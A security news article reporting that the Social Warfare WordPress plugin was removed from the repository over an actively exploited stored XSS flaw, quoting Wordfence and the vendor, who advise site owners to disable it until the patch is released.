WordPress plugin Social Warfare removed due to major vulnerability

According to a post on the WordPress security news website Wordfence, the popular WordPress social sharing plugin Social Warfare has been removed from the plugin repository due to a cross-site-scripting exploit. The stored XSS discovery was made by an unnamed researcher who published findings that showed the flaw being able to inject malicious JavaScript code into the social media share links that are usually found on blog posts.

This issue is major as over 70,000 websites were found by the anonymous researcher to currently have the plugin installed. Further compounding the issue is the fact that the XSS has confirmed instances of being exploited in the wild. It is this point that Wordfence expanded on in the following statement:

The Defiant Threat Intelligence team has already identified attacks against this vulnerability, and has deployed a firewall rule to prevent its exploitation. Premium users gain immediate access to the new rule, and after a thirty-day delay it will be available to Free users. Because this vulnerability has yet to be patched, it is recommended that site administrators deactivate the plugin until a patch is released.

At this time, we are refraining from publicizing details of the flaw and the attacks against it. At such time that the vendor makes a patch available, we will produce a follow-up post with further information.

In a follow-up comment to the Wordfence article, Jason Wiser of Warfare Plugins had this to say about how the company is responding to the issue:

Our entire development team is currently working to issue a patch and hope to have it released within the hour, but in the meantime we recommend disabling Social Warfare and Social Warfare Pro on your website.

This patch, once available will be listed as version 3.5.3 and you will be able to download and apply the update even while Social Warfare and Social Warfare Pro are disabled.

Wiser directed users check its support page and Twitter for “up to the minute updates on this issue.”

This is not the first time there has been concern about a WordPress plugin. But with how popular the Social Warfare plugin is, this could have turned out to be a complete nightmare. Had this anonymous researcher not found the XSS vulnerability in time, there is no telling how great the damage would have been. XSS is one of the most classic ways that hackers attack a web application, so one has to wonder how this issue went unnoticed for so long. Nevertheless, there is now an official plan of action for users and developers alike, so in the end things worked out.

Featured image: Shutterstock

About The Author

Leave a Comment

Your email address will not be published. Required fields are marked *

This site is protected by reCAPTCHA and the Google Privacy Policy and Terms of Service apply.

Scroll to Top